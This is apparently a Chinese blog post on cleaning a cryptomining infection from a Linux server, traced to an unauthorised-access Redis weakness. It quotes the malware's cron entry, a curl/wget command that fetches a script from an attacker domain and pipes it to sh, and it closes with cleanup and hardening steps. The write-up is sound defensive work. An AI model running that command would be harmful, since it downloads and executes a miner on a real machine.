背景: 收到朋友的委托,告诉我服务器中毒了,需要我去服务器上清除病毒
景象: 通过账号和密码登录服务器, 发现cpu居高不下,而且定时任务里有计划任务,干掉计划任务,又会立马生成
*/15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh
初步分析: 删除了计划任务又自动加上了,肯定是有个后台进程(后面)没有清除,没有干掉导致的,于是我在浏览器里打开
lsd.systemten.org
进行访问,发现是有个shell脚本,具体可以看 cron.sh初步分析这个shell我们可以得出:
- 他在写crontab,tmp目录给了任何用户读写权限
- kill 掉了安全工具
- 采用了cdn,那么连接ip就是不固定的
- 加了秘钥能进行免秘钥访问
[root@xxoo]# ps -aux
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
USERPID %CPU %MEMVSZRSS TTYSTAT STARTTIME COMMAND
root10.00.0254121648 ?Ss20180:00 /sbin/init
root20.00.000 ?S20180:00 [kthreadd]
root30.00.000 ?S20180:00 [migration/0]
root40.00.000 ?S20180:00 [ksoftirqd/0]
root50.00.000 ?S20180:00 [stopper/0]
root60.00.000 ?S20180:00 [watchdog/0]
root70.00.000 ?S20180:00 [migration/1]
root80.00.000 ?S20180:00 [stopper/1]
root90.00.000 ?S20180:00 [ksoftirqd/1]
root100.00.000 ?S20180:00 [watchdog/1]
root110.00.000 ?S20180:00 [events/0]
root120.00.000 ?S20180:00 [events/1]
root130.00.000 ?S20180:00 [events/0]
root140.00.000 ?S20180:00 [events/1]
root150.00.000 ?S20180:00 [events_long/0]
root160.00.000 ?S20180:00 [events_long/1]
root170.00.000 ?S20180:00 [events_power_ef]
root180.00.000 ?S20180:00 [events_power_ef]
root190.00.000 ?S20180:00 [cgroup]
root200.00.000 ?S20180:00 [khelper]
root210.00.000 ?S20180:00 [netns]
root220.00.000 ?S20180:00 [async/mgr]
root230.00.000 ?S20180:00 [pm]
root240.00.000 ?S20180:00 [sync_supers]
root250.00.000 ?S20180:00 [bdi-default]
root260.00.000 ?S20180:00 [kintegrityd/0]
root270.00.000 ?S20180:00 [kintegrityd/1]
root280.00.000 ?S20180:00 [kblockd/0]
root290.00.000 ?S20180:00 [kblockd/1]
root300.00.000 ?S20180:00 [kacpid]
root310.00.000 ?S20180:00 [kacpi_notify]
root320.00.000 ?S20180:00 [kacpi_hotplug]
root330.00.000 ?S20180:00 [ata_aux]
root340.00.000 ?S20180:00 [ata_sff/0]
root350.00.000 ?S20180:00 [ata_sff/1]
root360.00.000 ?S20180:00 [ksuspend_usbd]
root370.00.000 ?S20180:00 [khubd]
root380.00.000 ?S20180:00 [kseriod]
root390.00.000 ?S20180:00 [md/0]
root400.00.000 ?S20180:00 [md/1]
root410.00.000 ?S20180:00 [md_misc/0]
root420.00.000 ?S20180:00 [md_misc/1]
root430.00.000 ?S20180:00 [linkwatch]
root460.00.000 ?S20180:00 [khungtaskd]
root470.00.000 ?S20180:00 [kswapd0]
root480.00.000 ?SN20180:00 [ksmd]
root490.00.000 ?SN20180:00 [khugepaged]
root500.00.000 ?S20180:00 [aio/0]
root510.00.000 ?S20180:00 [aio/1]
root520.00.000 ?S20180:00 [crypto/0]
root530.00.000 ?S20180:00 [crypto/1]
root600.00.000 ?S20180:00 [kthrotld/0]
root610.00.000 ?S20180:00 [kthrotld/1]
root630.00.000 ?S20180:00 [kpsmoused]
root640.00.000 ?S20180:00 [usbhid_resumer]
root650.00.000 ?S20180:00 [deferwq]
root970.00.000 ?S20180:00 [kdmremove]
root980.00.000 ?S20180:00 [kstriped]
root2690.00.000 ?S20180:00 [scsi_eh_0]
root2700.00.000 ?S20180:00 [scsi_eh_1]
root2860.00.000 ?S20180:00 [virtio-blk]
root3400.00.000 ?S20180:00 [jbd2/vda1-8]
root3410.00.000 ?S20180:00 [ext4-dio-unwrit]
root4250.00.014940968 ?S[virtio-net]
root5620.00.000 ?S20180:00 [vballoon]
root6590.00.014908968 ?S<20180:00 /sbin/udevd -d
root6880.00.000 ?S20180:00 [kjournald]
root7210.00.000 ?S20180:00 [kauditd]
root9430.00.000 ?S20180:00 [flush-252:0]
root9730.00.015300732 ?Ss20180:00 /sbin/dhclient -H ISales-gzcaizhidanao -1 -q -cf /etc/dhcp/dhclient-eth0.
root10220.00.035948928 ?S=/var/run/irqbalance.pid
root11630.00.0360764472 ?Ssl20180:03 /usr/local/aegis/aegis_update/AliYunDunUpdate
root12020.00.1 126608 11492 ?S[cqueue]
root12660.00.014936944 ?S<20180:00 /sbin/udevd -d
ntp13970.00.0347281848 ?Ss20180:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root15490.00.0850723504 ?Ss20180:00 /usr/libexec/postfix/master
postfix15590.00.0853243648 ?S20180:00 qmgr -l -t fifo -u
root15860.00.025224576 ?Ss20180:00 /usr/sbin/atd
root16060.00.0823442808 ?Ssl20180:00 /usr/sbin/aliyun-service
[root@ISales-oo xx]#
通过经验查看各个路径,首先查看
/etc/bashrc
:文章图片
发现有redis,这个可能跟redis 未授权漏洞攻击手法一样
文章图片
【挖矿程序复盘】通过url搜索发现别人也遇到了 https://www.cnblogs.com/kobexffx/p/11000337.html
执行查杀脚本发现还是会在计划任务生成,所以要断网才能彻底去根除,于是我尝试些hosts 强制解析crontab的域名
发现,他自动给我吧hosts给删除了强制解析,因为是通过wget下载的 所以我直接把wget重命名,然后
yum remove postfix -y 先把crontab 卸载掉,再继续找木马,然后我在防火墙把这个域名解析的ip给禁掉
-A OUTPUT -d 95.215.19.12/32 -j REJECT --reject-with icmp-port-unreachable
然后我从正常的机器把ps命令拷贝过来进行分析(因为病毒把系统命令给劫持了)
文章图片
文章图片
文章图片
所以我把sshd 删掉 然后替换掉正常的,看/etc/passwd 有没有可疑账户 发现也没有
在 /usr/local/sbin 下发现很多隐藏文件,这些就是木马,劫持了系统命令
文章图片
删掉之后发现cpu降下来了,之前截图的apache等可疑进程干掉然后删除掉文件也正常了
结论:
攻击类型:
可能属于挖矿程序漏洞利用:
可能是reidis 未授权认证漏洞防护建议:
(1)Redis,mongodb 启用密码访问 或者监听不要用0.0.0.0,监听使用本机ip
(2)应用采用普通用户启动 不采用 root启动
(3)防火墙启动 ,不开放的端口进行关闭
(4)修改密码以及修改ssh端口
(5)部署架构: 数据库只有内网地址,不能上网. 应用和数据库分离开